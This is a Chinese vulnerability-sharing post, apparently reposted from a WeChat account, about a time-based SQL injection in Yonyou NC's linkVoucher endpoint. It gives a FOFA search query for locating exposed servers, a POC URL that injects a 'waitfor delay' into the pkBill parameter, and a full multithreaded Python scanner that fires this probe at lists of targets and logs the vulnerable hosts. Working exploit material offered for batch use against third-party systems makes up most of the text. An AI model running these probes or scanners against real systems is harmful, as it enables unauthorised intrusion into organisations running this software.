fofa查询语句:
app="用友-UFIDA-NC"
利用脚本进行检测:
手工复现:
POC
/portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'--
批量检测脚本
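# Time-based detection check for the SQL injection in the Yonyou (用友) NC
# linkVoucher endpoint described above.
#
# For every target the script sends one GET request whose pkBill parameter
# carries a `waitfor delay '0:0:5'` probe and flags the host when the response
# takes at least five seconds. The probe only delays the database response;
# nothing in this script reads or modifies data. Flagged URLs are appended to
# "<file_name>_vuln.txt" and listed at the end of the run.
import requests
import re
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random
import os

# Certificate verification is switched off for every request below (targets
# often present self-signed certificates), so the matching warning is muted.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

url_list = []
file_name = '用友NC系统 linkVoucher sql注入'
# fofa:app="用友-UFIDA-NC"


def get_ua():
    """Return a randomised desktop-Chrome User-Agent string."""
    first_num = random.randint(55, 62)
    third_num = random.randint(0, 3200)
    fourth_num = random.randint(0, 140)
    os_type = [
        '(Windows NT 6.1; WOW64)',
        '(Windows NT 10.0; WOW64)',
        '(Macintosh; Intel Mac OS X 10_12_6)'
    ]
    chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)
    return ' '.join([
        'Mozilla/5.0',
        random.choice(os_type),
        'AppleWebKit/537.36',
        '(KHTML, like Gecko)',
        chrome_version,
        'Safari/537.36',
    ])


# Local intercepting-proxy settings. Defined for debugging only: no request in
# this script passes them, so traffic goes out directly.
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'http://127.0.0.1:8080'}


def wirte_targets(vurl, file_name):
    """Append one result line to the results file *file_name*."""
    # Explicit UTF-8: the result line contains non-ASCII text, and the
    # platform default encoding is not guaranteed to be able to encode it.
    with open(file_name, "a+", encoding="utf-8") as f:
        f.write(vurl + "\n")


def check_file(filename):
    """Print every flagged URL recorded in *filename*, plus a count.

    The results file is opened in append mode by wirte_targets(), so entries
    from earlier runs are listed here as well.
    """
    print('-------------------------------------------')
    # Use the path the caller passed in; the original rebuilt it from the
    # module-level file_name and silently ignored this parameter.
    if os.path.isfile(filename):
        print('存在漏洞的url如下~~~')
        # errors="replace" keeps a results file written by an older run under
        # a different default encoding from aborting the summary.
        with open(filename, 'r', encoding='utf-8', errors='replace') as file:
            lines = file.readlines()
        for line in lines:
            print(f'\033[32m{line.strip()}\033[0m')
        print('存在漏洞url:{}个'.format(len(lines)))
    else:
        print('未发现漏洞!!!!')
    print('-------------------------------------------')


def check_vuln(url):
    """Send the timing probe to one target and record it if the reply is slow.

    *url* must carry a scheme and host (``http://ip:port``); only those two
    parts are used to build the request. A response time of five seconds or
    more is treated as a hit and appended to the results file.
    """
    try:
        parsed = parse.urlparse(url)
    except ValueError:
        parsed = None
    if parsed is None or not parsed.scheme or not parsed.netloc:
        # Without a scheme, urlparse yields no host and the request URL would
        # be malformed; report the entry instead of mislabelling it a timeout.
        print("\033[31m[!]{} is not a valid URL (expected http://ip:port)\033[0m".format(url))
        return

    url1 = parsed.scheme + '://' + parsed.netloc
    vuln_url = f"{url1}/portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'--"
    headers = {
        'User-Agent': get_ua(),
        'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7',
        'Accept-Encoding': 'gzip, deflate',
        'Accept-Language': 'zh-CN,zh;q=0.9',
        'Connection': 'keep-alive',
        'Cache-Control': 'max-age=0',
    }

    try:
        res = requests.get(url=vuln_url, headers=headers, allow_redirects=False,
                           timeout=15, verify=False)
    except requests.exceptions.Timeout:
        print("\033[31m[!]{} is timeout\033[0m".format(url1))
        return
    except requests.exceptions.RequestException as e:
        # Connection refused, DNS failure, TLS error, ... - not a timeout.
        print("\033[31m[!]{} request failed: {}\033[0m".format(url1, e))
        return

    # NOTE(review): in the published listing this assignment appears behind a
    # '#', which would leave res_time undefined and make every target fall
    # into the exception handler. It is required for the comparison below.
    res_time = res.elapsed.total_seconds()

    # A slow answer is an indicator, not proof: a loaded or distant host can
    # take five seconds without any injection. Confirm each hit manually
    # (compare with the same request without the delay probe) before
    # reporting it.
    if res_time >= 5:
        print('\033[32m[+]{} 延迟:{}秒\033[0m'.format(vuln_url, res_time))
        wirte_targets(vuln_url + f' 延迟:{res_time}秒', f"{file_name}_vuln.txt")
    else:
        print("\033[34m[-]{} not vulnerable. {}\033[0m".format(url1, res.status_code))


def multithreading(url_list, pools=5):
    """Run check_vuln() over *url_list* with a pool of *pools* worker threads."""
    pool = threadpool.ThreadPool(pools)
    for req in threadpool.makeRequests(check_vuln, list(url_list)):
        pool.putRequest(req)
    pool.wait()


if __name__ == '__main__':
    print(f"\n{file_name}\n ——————by hyuya~\n"
          f" ——————知识星球:大自然的nday搬运库(石占)")
    arg = ArgumentParser(description=f'{file_name}')
    arg.add_argument("-u", "--url", help="Target URL; Example:http://ip:port")
    arg.add_argument("-f", "--file", help="Target URL; Example:url.txt")
    args = arg.parse_args()
    url = args.url
    filename = args.file

    # Exactly one input mode is supported; the original did nothing at all
    # when neither or both options were given.
    if (url is None) == (filename is None):
        arg.error("specify exactly one of -u/--url or -f/--file")

    start = time()
    print('[*]任务开始...')
    if url is not None:
        check_vuln(url)
        check_file(f'{file_name}_vuln.txt')
    else:
        # Close the list file deterministically, and drop blank lines and
        # stray '\r' characters so they do not become malformed targets.
        with open(filename, encoding='utf-8') as targets:
            for entry in targets:
                entry = entry.strip()
                if entry:
                    url_list.append(entry)
        multithreading(url_list, 10)
        end = time()
        print('任务完成,用时%d' % (end - start))
        check_file(f'{file_name}_vuln.txt')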
原文始发于微信公众号(Undoubted Security):【漏洞分享】用友 NC linkVoucher SQL注入 用友漏洞利用